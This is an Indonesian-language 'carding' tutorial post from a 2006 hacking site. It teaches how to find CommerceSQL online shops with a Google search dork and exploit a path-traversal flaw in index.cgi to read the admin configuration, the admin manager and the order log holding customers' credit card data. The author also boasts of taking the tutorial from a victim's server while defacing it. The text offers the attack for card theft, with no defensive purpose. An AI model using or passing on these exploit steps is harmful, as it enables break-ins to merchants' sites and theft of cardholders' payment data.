� Back

� WWW.SPYROZONE.TK �

 

[151]. Tutorial Carding (Bagian V)

    

  

------------------------------------------------------

Author  : SPYRO KiD

Contact : SPYRO_ZONE@yahoo.com ==> WWW.SPYROZONE.TK

CopyLEFT (c) 2006 www.spyrozone.tk All Rights Reserved

� 28/09/2006  03:40:15 WIB

------------------------------------------------------

 

--------------------------------------

Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul "Mengapa aku mendeface profil FS dan website Fun2Holic" (19 september 2006) di halaman Cerita Hari iNi.

--------------------------------------

 

Materi ke-5 : commerceSQL
1. Cari target dahulu Website commerceSQL di google.com, dengan keyword:

   allinurl:/commercesql/
2. Misalkan kita mendapat target dg url

   http://www.contoh.com/commercesql/blablabla , maka :
3. Ganti url tsb menjadi

   -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=<injection page>
4. Contoh untuk melihat admin config

   -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
5. Contoh untuk melihat admin manager

   http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
6. Sedangkan utk melihat file log/ccnya ->   http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
7. Materi ke-5 Selesai.

  

 

/* ------------------------------|EOF|------------------------------ */

 

   � Back

� WWW.SPYROZONE.TK �